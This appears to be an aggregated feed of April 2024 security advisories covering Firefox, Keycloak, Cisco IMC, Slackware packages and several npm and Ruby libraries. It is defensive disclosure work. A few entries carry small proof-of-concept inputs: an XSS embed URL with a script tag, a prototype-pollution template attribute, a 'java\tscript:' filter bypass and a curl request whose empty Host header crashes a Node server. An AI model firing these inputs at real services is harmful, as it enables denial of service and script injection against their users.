https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-107-01
16.04.2024 14:43:39 ubuntu [USN-6736-1] klibc vulnerabilities (critical)
Several security issues were fixed in klibc.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6736-1

16.04.2024 14:31:52 ubuntu [USN-6735-1] Node.js vulnerabilities (high)
Several security issues were fixed in Node.js.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6735-1

16.04.2024 03:00:00 debian [DSA-5662-1] apache2 (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5662-1

16.04.2024 03:00:00 debian [DSA-5655-2] cockpit
regression update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5655-2
16.04.2024 03:00:00 mozilla [MFSA-2024-19] Security Vulnerabilities fixed in Firefox ESR 115.10 (high)
- CVE-2024-2609: Permission prompt input delay could expire when not in focus (moderate)
  The permission prompt input delay could expire while the window is not in focus. This makes it vulnerable to clickjacking by malicious websites.
- CVE-2024-3302: Denial of Service using HTTP/2 CONTINUATION frames (low)
  There was no limit to the number of HTTP/2 CONTINUATION frames that would be processed. A server could abuse this to create an Out of Memory condition in the browser.
- CVE-2024-3852: GetBoundName in the JIT returned the wrong object (high)
  GetBoundName could return the wrong version of an object when JIT optimizations were applied.
- CVE-2024-3854: Out-of-bounds-read after mis-optimized switch statement (high)
  In some code patterns the JIT incorrectly optimized switch statements and generated code with out-of-bounds-reads.
- CVE-2024-3857: Incorrect JITting of arguments led to use-after-free during garbage collection (high)
  The JIT created incorrect code for arguments in certain cases. This led to potential use-after-free crashes during garbage collection.
- CVE-2024-3859: Integer-overflow led to out-of-bounds-read in the OpenType sanitizer (moderate)
  On 32-bit versions there were integer-overflows that led to an out-of-bounds-read that potentially could be triggered by a malformed OpenType font.
- CVE-2024-3861: Potential use-after-free due to AlignedBuffer self-move (moderate)
  If an AlignedBuffer were assigned to itself, the subsequent self-move could result in an incorrect reference count and later use-after-free.
- CVE-2024-3863: Download Protections were bypassed by .xrm-ms files on Windows (moderate)
  The executable file warning was not presented when downloading .xrm-ms files. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*
- CVE-2024-3864: Memory safety bug fixed in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10 (high)
  Memory safety bug present in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-19
16.04.2024 03:00:00 mozilla [MFSA-2024-18] Security Vulnerabilities fixed in Firefox 125 (high)
- CVE-2024-3302: Denial of Service using HTTP/2 CONTINUATION frames (low)
  There was no limit to the number of HTTP/2 CONTINUATION frames that would be processed. A server could abuse this to create an Out of Memory condition in the browser.
- CVE-2024-3852: GetBoundName in the JIT returned the wrong object (high)
  GetBoundName could return the wrong version of an object when JIT optimizations were applied.
- CVE-2024-3853: Use-after-free if garbage collection runs during realm initialization (high)
  A use-after-free could result if a JavaScript realm was in the process of being initialized when a garbage collection started.
- CVE-2024-3854: Out-of-bounds-read after mis-optimized switch statement (high)
  In some code patterns the JIT incorrectly optimized switch statements and generated code with out-of-bounds-reads.
- CVE-2024-3855: Incorrect JIT optimization of MSubstr leads to out-of-bounds reads (high)
  In certain cases the JIT incorrectly optimized MSubstr operations, which led to out-of-bounds reads.
- CVE-2024-3856: Use-after-free in WASM garbage collection (high)
  A use-after-free could occur during WASM execution if garbage collection ran during the creation of an array.
- CVE-2024-3857: Incorrect JITting of arguments led to use-after-free during garbage collection (high)
  The JIT created incorrect code for arguments in certain cases. This led to potential use-after-free crashes during garbage collection.
- CVE-2024-3858: Corrupt pointer dereference in js::CheckTracedThing<js::Shape> (high)
  It was possible to mutate a JavaScript object so that the JIT could crash while tracing it.
- CVE-2024-3859: Integer-overflow led to out-of-bounds-read in the OpenType sanitizer (moderate)
  On 32-bit versions there were integer-overflows that led to an out-of-bounds-read that potentially could be triggered by a malformed OpenType font.
- CVE-2024-3860: Crash when tracing empty shape lists (moderate)
  An out-of-memory condition during object initialization could result in an empty shape list. If the JIT subsequently traced the object it would crash.
- CVE-2024-3861: Potential use-after-free due to AlignedBuffer self-move (moderate)
  If an AlignedBuffer were assigned to itself, the subsequent self-move could result in an incorrect reference count and later use-after-free.
- CVE-2024-3862: Potential use of uninitialized memory in MarkStack assignment operator on self-assignment (moderate)
  The MarkStack assignment operator, part of the JavaScript engine, could access uninitialized memory if it were used in a self-assignment.
- CVE-2024-3863: Download Protections were bypassed by .xrm-ms files on Windows (moderate)
  The executable file warning was not presented when downloading .xrm-ms files. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*
- CVE-2024-3864: Memory safety bug fixed in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10 (high)
  Memory safety bug present in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code.
- CVE-2024-3865: Memory safety bugs fixed in Firefox 125 (high)
  Memory safety bugs present in Firefox 124. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-18
18.04.2024 01:26:38 npm [NPM:GHSA-82JV-9WJW-PQH6] Prototype pollution in emit function (low)
### Summary
A prototype pollution in derby can crash the application, if the application author has atypical HTML templates that feed user input into an object key.

Attribute keys are almost always developer-controlled, not end-user-controlled, so this shouldn't be an issue in practice for most applications.

### Details
```
emit(context: Context, target: T) {
  const node = traverseAndCreate(context.controller, this.segments);
  node[this.lastSegment] = target;
  this.addListeners(target, node, this.lastSegment);
}
```
The emit() function in src/templates/templates.ts is called without sanitizing the variable `this.lastSegment`. The variable `this.lastSegment` can be set to `__proto__`, and this will pollute the prototype of the JavaScript Object (`node['__proto__'] = target`).

### PoC
To reproduce this vulnerability, you can adjust the test case `ignores DOM mutations in components' create()` in `test/dom/ComponentHarness.mocha.js`.
```
it('ignores DOM mutations in components\' create()', function() {
  function Box() {}
  Box.view = {
    is: 'box',
-   source: '<index:><div class="box" as="boxElement"></div>'
+   source: '<index:><div class="box" as="__proto__"></div>'
  };
  Box.prototype.create = function() {
    this.boxElement.className = 'box-changed-in-create';
  };
  var harness = runner.createHarness('<view is="box" />', Box);
  expect(harness).to.render('<div class="box"></div>');
});
```
When the `as` attribute is controlled by attackers, the variable `this.lastSegment` will take exactly the value `__proto__` and prototype pollution happens.

### Patch
Adding a check on `this.lastSegment` can prevent this attack.
```
emit(context: Context, target: T) {
  const node = traverseAndCreate(context.controller, this.segments);
+ if (this.lastSegment.includes('__proto__') || this.lastSegment.includes('prototype')) {
+   throw new Error('Unsafe code detected');
+ }
  node[this.lastSegment] = target;
  this.addListeners(target, node, this.lastSegment);
}
```
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-82JV-9WJW-PQH6
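Review bot: the guard added in the Patch hunk uses `includes()`, a substring match, so it also rejects any legitimate `as` name that merely contains the text `prototype` and makes templates that rendered before throw `Unsafe code detected`; an exact comparison against the forbidden keys, or creating the container returned by `traverseAndCreate` as a null-prototype object so that no attribute key can reach `Object.prototype`, would block the pollution without that false positive. The thrown error should also name the offending segment so that the failing template can be located from the log.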
18.04.2024 03:31:05 npm [NPM:GHSA-M64Q-4JQH-F72F] Stored Cross-site Scripting (XSS) in excalidraw's web embed component (moderate)
### Summary
A stored XSS vulnerability in Excalidraw's web embeddable component. This allows arbitrary JavaScript to be run in the context of the domain where the editor is hosted.

### PoC
Inserting an embed with the below url (can be copy/pasted onto canvas to insert as embed) will log `42` to the console:
```
https://gist.github.com/vv=v<script>console.log(42)</script>
```

### Details
There were two vectors. The first was rendering an untrusted string as the iframe's `srcdoc` without properly sanitizing against HTML injection. The second was improperly sanitizing against attribute HTML injection. This, in conjunction with allowing the `allow-same-origin` sandbox flag (necessary for several embeds), resulted in the XSS.

The former was fixed by no longer rendering unsafe `srcdoc` content verbatim, and instead strictly parsing the supplied content and constructing the `srcdoc` manually. The latter was fixed by sanitizing properly.

The `allow-same-origin` flag is now also set only in cases that require it, following the principle of least privilege.

### Impact
This is a cross site scripting vulnerability; for more information, please see: https://portswigger.net/web-security/cross-site-scripting

Two npm `@excalidraw/excalidraw` stable version releases were affected (`0.16.x`, `0.17.x`), and both are now patched.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M64Q-4JQH-F72F
17.04.2024 23:42:46 slackware [SSA:2024-108-01] mozilla-thunderbird
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/mozilla-thunderbird-115.10.0-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.10.0/releasenotes/
    https://www.mozilla.org/en-US/security/known-vulnerabilities/thunderbird/#thunderbird115.10
  (* Security fix *)
```

**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.10.0-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.10.0-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.10.0-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.10.0-x86_64-1.txz

**MD5 signatures**
Slackware 15.0 package:
a745479bb3b4f14dfec630e5374fb0d3 mozilla-thunderbird-115.10.0-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
5b00ddd1e6847325ecda26dc6af10179 mozilla-thunderbird-115.10.0-x86_64-1_slack15.0.txz

Slackware -current package:
771573cbbcfa34c1d26dffb3e92d783f xap/mozilla-thunderbird-115.10.0-i686-1.txz

Slackware x86_64 -current package:
dee5b9d034569a279d52215f01f0e879 xap/mozilla-thunderbird-115.10.0-x86_64-1.txz

**Installation instructions**
Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.10.0-i686-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-108-01
17.04.2024 21:26:00 maven [MAVEN:GHSA-7FPJ-9HR8-28VH] Keycloak vulnerable to impersonation via logout token exchange (low)
Keycloak was found to not properly enforce token types when validating signatures locally. An authenticated attacker could use this flaw to exchange a logout token for an access token and possibly gain access to data outside of enforced permissions.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7FPJ-9HR8-28VH

17.04.2024 21:25:30 maven [MAVEN:GHSA-C9H6-V78W-52WJ] Keycloak vulnerable to session hijacking via re-authentication (moderate)
A flaw was found in Keycloak. An active Keycloak session can be hijacked by initiating a new authentication (having the query parameter prompt=login) and forcing the user to enter their credentials once again. If the user cancels this re-authentication by clicking Restart login, the account takeover could take place as the new session, with a different SUB, will have the same SID as the previous session.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C9H6-V78W-52WJ

17.04.2024 21:25:09 maven [MAVEN:GHSA-72VP-XFRC-42XM] Keycloak path transversal vulnerability in redirection validation (high)
A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. An attacker can use this flaw to construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain or possibly conduct further attacks. This flaw affects any client that utilizes a wildcard in the Valid Redirect URIs field.

#### Acknowledgements:
Special thanks to Axel Flamcourt for reporting this issue and helping us improve our project.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-72VP-XFRC-42XM

17.04.2024 21:24:39 maven [MAVEN:GHSA-M6Q9-P373-G5Q8] Keycloak's unvalidated cross-origin messages in checkLoginIframe leads to DDoS (high)
A potential security flaw in the "checkLoginIframe" which allows unvalidated cross-origin messages, enabling potential DDoS attacks. By exploiting this vulnerability, attackers could coordinate to send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.

#### Acknowledgements
Special thanks to Adriano Márcio Monteiro from BRZTEC for reporting this issue and helping us improve our project.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M6Q9-P373-G5Q8

17.04.2024 21:24:04 maven [MAVEN:GHSA-J628-Q885-8GR5] Keycloak vulnerable to log Injection during WebAuthn authentication or registration (low)
A flaw was found in Keycloak 22.0.5. Errors in the browser client during setup/auth with "Security Key login" (WebAuthn) are written into the form, sent to Keycloak and logged without escaping, allowing log injection.

Acknowledgements:
Special thanks to Theresa Henze for reporting this issue and helping us improve our security.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J628-Q885-8GR5

18.04.2024 00:29:14 npm [NPM:GHSA-8M45-2RJM-J347] Handling untrusted input can result in a crash, leading to loss of availability / denial of service (high)
Using particular inputs with `@solana/web3.js` will result in memory exhaustion (OOM).

If you have a server, client, mobile, or desktop product that accepts untrusted input for use with `@solana/web3.js`, your application/service may crash, resulting in a loss of availability.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8M45-2RJM-J347

17.04.2024 20:33:29 maven [MAVEN:GHSA-46C8-635V-68R2] Keycloak Authorization Bypass vulnerability (moderate)
Due to a permissive regular expression hardcoded for filtering allowed hosts to register a dynamic client, a malicious user with enough information about the environment could benefit and jeopardize an environment with this specific Dynamic Client Registration with TrustedDomain configuration previously unauthorized.

#### Acknowledgements:
Special thanks to Bastian Kanbach for reporting this issue and helping us improve our security.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-46C8-635V-68R2

17.04.2024 20:33:06 maven [MAVEN:GHSA-8RMM-GM28-PJ8Q] Keycloak Cross-site Scripting (XSS) via assertion consumer service URL in SAML POST-binding flow (high)
Keycloak allows arbitrary URLs as SAML Assertion Consumer Service POST Binding URL (ACS), including JavaScript URIs (javascript:).

Allowing JavaScript URIs in combination with HTML forms leads to JavaScript evaluation in the context of the embedding origin on form submission.

#### Acknowledgements:
Special thanks to Lauritz Holtmann for reporting this issue and helping us improve our project.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8RMM-GM28-PJ8Q

17.04.2024 20:31:51 maven [MAVEN:GHSA-4F53-XH3V-G8X4] Keycloak secondary factor bypass in step-up authentication (moderate)
Keycloak does not correctly validate its client step-up authentication. A password-authenticated attacker could use this flaw to register a false second auth factor, alongside the existing one, to a targeted account. The second factor then permits step-up authentication.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4F53-XH3V-G8X4

17.04.2024 21:31:33 maven [MAVEN:GHSA-MRV8-PQFJ-7GP5] Keycloak path traversal vulnerability in the redirect validation (high)
An issue was found in the redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MRV8-PQFJ-7GP5

17.04.2024 19:00:00 cisco [CISCO-SA-SNMP-UWBXFQWW] Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability (medium)
A vulnerability in the implementation of the Simple Network Management Protocol (SNMP) IPv4 access control list (ACL) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform SNMP polling of an affected device, even if it is configured
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNMP-UWBXFQWW

17.04.2024 19:00:00 cisco [CISCO-SA-CIMC-CMD-INJ-MUX4C5AJ] Cisco Integrated Management Controller CLI Command Injection Vulnerability (high)
A vulnerability in the CLI of the Cisco Integrated Management Controller (IMC) could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CIMC-CMD-INJ-MUX4C5AJ

17.04.2024 19:00:00 cisco [CISCO-SA-CIMC-CMD-INJ-BLUPCB] Cisco Integrated Management Controller Web-Based Management Interface Command Injection Vulnerability (high)
A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CIMC-CMD-INJ-BLUPCB

17.04.2024 20:35:57 maven [MAVEN:GHSA-R52H-FJM7-93J8] BlazeMeter Jenkins plugin vulnerable to Cross-Site Request Forgery (moderate)
Versions of the BlazeMeter Jenkins plugin prior to 4.22 contain a flaw which results in credential enumeration.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R52H-FJM7-93J8

17.04.2024 18:26:47 ubuntu [USN-6729-2] Apache HTTP Server vulnerabilities
Several security issues were fixed in Apache HTTP Server.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6729-2
17.04.2024 21:10:53 go [GO-2024-2730] WITHDRAWN: Directory traversal in FilesystemStore in github.com/gorilla/sessions
(This report has been withdrawn on the grounds that it generates too many false positives. Session IDs are documented as not being suitable to hold user-provided data.)

FilesystemStore does not sanitize the Session.ID value, making it vulnerable to directory traversal attacks. If an attacker has control over the contents of the session ID, this can be exploited to write to arbitrary files in the filesystem.

Programs which do not set session IDs explicitly, or which only set session IDs that will not be interpreted by the filesystem, are not vulnerable.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2730
17.04.2024 16:06:30 ubuntu [USN-6726-3] Linux kernel (Xilinx ZynqMP) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6726-3

17.04.2024 03:00:00 debian [DSA-5663-1] firefox-esr
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5663-1

17.04.2024 03:00:00 debian [DSA-5664-1] jetty9 (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5664-1

17.04.2024 03:00:00 debian [DSA-5665-1] tomcat10 (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5665-1

17.04.2024 03:00:00 jenkins [JENKINS:SECURITY-3386] Terrapin SSH vulnerability in Jenkins CLI client (medium)
The CLI client (`jenkins-cli.jar`) in Jenkins 2.451 and earlier, LTS 2.440.2 and earlier bundles versions of the Apache MINA SSHD library that are susceptible to CVE-2023-48795 (https://www.cve.org/CVERecord?id=CVE-2023-48795), the Terrapin attack (https://en.wikipedia.org/wiki/Terrapin_attack).

This vulnerability allows a machine-in-the-middle attacker to reduce the security of an SSH connection.

NOTE: This only affects the Jenkins CLI client when using the `-ssh` connection mode, which is not the default.

The CLI client (`jenkins-cli.jar`) in Jenkins 2.452, LTS 2.440.3 bundles version 2.12.1 of the Apache MINA SSHD library, which is unaffected by this issue.
https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3386
17.04.2024 03:00:00 oraclelinux [ELSA-2024-1817] java-1.8.0-openjdk security update (moderate)
[1:1.8.0.412.b08-1]
- Update to shenandoah-jdk8u412-b08 (GA)
- Update release notes for shenandoah-8u412-b08.
- Complete release note for Certainly roots
- Switch to GA mode.
- ** This tarball is embargoed until 2024-04-16 @ 1pm PT. **
- Related: RHEL-30926

[1:1.8.0.412.b07-0.1.ea]
- Update to shenandoah-jdk8u412-b07 (EA)
- Update release notes for shenandoah-8u412-b07.
- Require tzdata 2024a due to upstream inclusion of JDK-8322725
- Only require tzdata 2023d for now as 2024a is unavailable in buildroot
- Resolves: RHEL-30926

[1:1.8.0.412.b01-0.1.ea]
- Turn off xz multi-threading on i686 as it fails with an out of memory error
- Normalise whitespace
- Move to upstream tag style (shenandoah8ux-by) in preparation for eventually moving back to official sources
- generate_source_tarball.sh: Rename JCONSOLE_JS_PATCH{,_DEFAULT} to JCONSOLE_PATCH{,_DEFAULT} for brevity
- generate_source_tarball.sh: Adapt OPENJDK_LATEST logic to work with 8u Shenandoah fork
- generate_source_tarball.sh: Adapt version logic to work with 8u
- generate_source_tarball.sh: Add quoting for SCRIPT_DIR and JCONSOLE_PATCH (SC2086)
- generate_source_tarball.sh: Update examples in header for clarity
- generate_source_tarball.sh: Create directory in TMPDIR when using WITH_TEMP
- generate_source_tarball.sh: Only add --depth=1 on non-local repositories
- Move maintenance scripts to a scripts subdirectory
- icedtea_sync.sh: Update with a VCS mode that retrieves sources from a Mercurial repository
- jconsole.desktop.in: Restored by running icedtea_sync.sh
- policytool.desktop.in: Likewise.
- Restore IcedTea sources correctly in spec file
- discover_trees.sh: Set compile-command and indentation instructions for Emacs
- discover_trees.sh: shellcheck: Do not use -o (SC2166)
- discover_trees.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- discover_trees.sh: shellcheck: Double-quote variable references (SC2086)
- generate_source_tarball.sh: Add authorship
- icedtea_sync.sh: Set compile-command and indentation instructions for Emacs
- icedtea_sync.sh: shellcheck: Double-quote variable references (SC2086)
- icedtea_sync.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- openjdk_news.sh: Set compile-command and indentation instructions for Emacs
- openjdk_news.sh: shellcheck: Double-quote variable references (SC2086)
- openjdk_news.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- openjdk_news.sh: shellcheck: Remove deprecated egrep usage (SC2196)
- generate_source_tarball.sh: Handle an existing checkout
- generate_source_tarball.sh: Sync indentation with java-21-openjdk version
- generate_source_tarball.sh: Support using a subdirectory via TO_COMPRESS
- Related: RHEL-30926

[1:1.8.0.412.b01-0.1.ea]
- Invoke xz in multi-threaded mode
- generate_source_tarball.sh: Add WITH_TEMP environment variable
- generate_source_tarball.sh: Multithread xz on all available cores
- generate_source_tarball.sh: Add OPENJDK_LATEST environment variable
- generate_source_tarball.sh: Update comment about tarball naming
- generate_source_tarball.sh: Reformat comment header
- generate_source_tarball.sh: Reformat and update help output
- generate_source_tarball.sh: Do a shallow clone, for speed
- generate_source_tarball.sh: Eliminate some removal prompting
- generate_source_tarball.sh: Make tarball reproducible
- generate_source_tarball.sh: Prefix temporary directory with temp-
- generate_source_tarball.sh: Remove temporary directory exit conditions
- generate_source_tarball.sh: Set compile-command in Emacs
- generate_source_tarball.sh: Remove REPO_NAME from FILE_NAME_ROOT
- generate_source_tarball.sh: Move PROJECT_NAME and REPO_NAME checks
- generate_source_tarball.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- generate_source_tarball.sh: shellcheck: Double-quote variable references (SC2086)
- generate_source_tarball.sh: shellcheck: Do not use -a (SC2166)
- generate_source_tarball.sh: shellcheck: Do not use $ on arithmetic variables (SC2004)
- Use backward-compatible patch syntax
- generate_source_tarball.sh: Ignore -ga tags with OPENJDK_LATEST
- generate_source_tarball.sh: Remove trailing period in echo
- generate_source_tarball.sh: Use long-style argument to grep
- generate_source_tarball.sh: Add license
- generate_source_tarball.sh: Add indentation instructions for Emacs
- Remove -T0 argument from systemtap tar invocation
- Related: RHEL-30926

[1:1.8.0.412.b01-0.1.ea]
- Update to shenandoah-jdk8u412-b01 (EA)
- Update release notes for shenandoah-8u412-b01.
- Switch to EA mode.
- Related: RHEL-30926
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1817
17.04.2024 15:52:51 rubysec [RUBYSEC:PHLEX-G7XQ-XV8C-H98C] Cross-site Scripting (XSS) possible due to improper sanitisation of `href` attributes on `<a>` tags (high)
### Summary
There is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data.

Our filter to detect and prevent the use of the `javascript:` URL scheme in the `href` attribute of an `<a>` tag could be bypassed with tab `\t` or newline `\n` characters between the characters of the protocol, e.g. `java\tscript:`.

### Impact
If you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user.
```ruby
a(href: user_profile) { "Profile" }
```

### Mitigation
The best way to mitigate this vulnerability is to update to one of the following versions:
- [1.10.1](https://rubygems.org/gems/phlex/versions/1.10.1)
- [1.9.2](https://rubygems.org/gems/phlex/versions/1.9.2)
- [1.8.3](https://rubygems.org/gems/phlex/versions/1.8.3)
- [1.7.2](https://rubygems.org/gems/phlex/versions/1.7.2)
- [1.6.3](https://rubygems.org/gems/phlex/versions/1.6.3)
- [1.5.3](https://rubygems.org/gems/phlex/versions/1.5.3)
- [1.4.2](https://rubygems.org/gems/phlex/versions/1.4.2)

### Workarounds
Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline) would effectively prevent this vulnerability from being exploited.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PHLEX-G7XQ-XV8C-H98C
20.04.2024 00:44:11 npm [NPM:GHSA-HGXW-5XG3-69JX] @hono/node-server has Denial of Service risk when receiving Host header that cannot be parsed (high)
### Impact
The application hangs when receiving a Host header with a value that `@hono/node-server` can't handle well. Invalid values are those that cannot be parsed by the `URL` as a hostname, such as an empty string, slashes `/`, and other strings.

For example, if you have a simple application:
```ts
import { serve } from '@hono/node-server'
import { Hono } from 'hono'

const app = new Hono()
app.get('/', (c) => c.text('Hello'))

serve(app)
```
Sending a request with a Host header with an empty value to it:
```
curl localhost:3000/ -H "Host: "
```
The results:
```
node:internal/url:775
    this.#updateContext(bindingUrl.parse(input, base));
                                   ^

TypeError: Invalid URL
    at new URL (node:internal/url:775:36)
    at newRequest (/Users/yusuke/work/h/159/node_modules/@hono/node-server/dist/index.js:137:17)
    at Server.<anonymous> (/Users/yusuke/work/h/159/node_modules/@hono/node-server/dist/index.js:399:17)
    at Server.emit (node:events:514:28)
    at Server.emit (node:domain:488:12)
    at parserOnIncoming (node:_http_server:1143:12)
    at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17) {
  code: 'ERR_INVALID_URL',
  input: 'http:///'
}
```

### Patches
The version `1.10.1` includes the fix for this issue. But you should use `1.11.0`, which has other fixes related to this issue:
https://github.com/honojs/node-server/issues/160
https://github.com/honojs/node-server/issues/161

### Workarounds
Nothing. Upgrade your `@hono/node-server`.

### References
https://github.com/honojs/node-server/issues/159
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HGXW-5XG3-69JX
19.04.2024 22:45:28 | slackware | [SSA:2024-110-01] freerdp

New freerdp packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/freerdp-2.11.6-i586-1_slack15.0.txz: Upgraded.
  This release is a security release and addresses multiple issues:
  [Low] OutOfBound Read in zgfx_decompress_segment.
  [Moderate] Integer overflow & OutOfBound Write in clear_decompress_residual_data.
  [Low] integer underflow in nsc_rle_decode.
  [Low] OutOfBound Read in planar_skip_plane_rle.
  [Low] OutOfBound Read in ncrush_decompress.
  [Low] OutOfBound Read in interleaved_decompress.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-32041
    https://www.cve.org/CVERecord?id=CVE-2024-32039
    https://www.cve.org/CVERecord?id=CVE-2024-32040
    https://www.cve.org/CVERecord?id=CVE-2024-32458
    https://www.cve.org/CVERecord?id=CVE-2024-32459
    https://www.cve.org/CVERecord?id=CVE-2024-32460
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/freerdp-2.11.6-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/freerdp-2.11.6-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/freerdp-2.11.6-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/freerdp-2.11.6-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
e1047f9cca0b0c882206445baa5a7ae5  freerdp-2.11.6-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
1411705cbf21668ba56e322619956a69  freerdp-2.11.6-x86_64-1_slack15.0.txz

Slackware -current package:
6659989e410814dca9b57162f7c83622  xap/freerdp-2.11.6-i586-1.txz

Slackware x86_64 -current package:
d6ea7c0d6e7880964bbde2b6cec26f6e  xap/freerdp-2.11.6-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg freerdp-2.11.6-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-110-01
19.04.2024 20:26:37 | npm | [NPM:GHSA-23Q2-5GF8-GJPP] Enabling Authentication does not close all logged in socket connections immediately (low)

### Summary

This is basically [GHSA-88j4-pcx8-q4q3](https://github.com/louislam/uptime-kuma/security/advisories/GHSA-88j4-pcx8-q4q3) but instead of changing passwords, when enabling authentication.

### PoC

- Open Uptime Kuma with authentication disabled
- Enable authentication using another window
- Access the platform using the previously logged-in window
- Note that access (read-write) remains despite the enabled authentication
- Expected behaviour:
  - After enabling authentication, all previously connected sessions should be invalidated, requiring users to log in.
- Actual behaviour:
  - The system retains sessions and never logs out users unless explicitly done by clicking logout or refreshing the page.

### Impact

See [GHSA-g9v2-wqcj-j99g](https://github.com/louislam/uptime-kuma/security/advisories/GHSA-g9v2-wqcj-j99g) and [GHSA-88j4-pcx8-q4q3](https://github.com/louislam/uptime-kuma/security/advisories/GHSA-88j4-pcx8-q4q3)

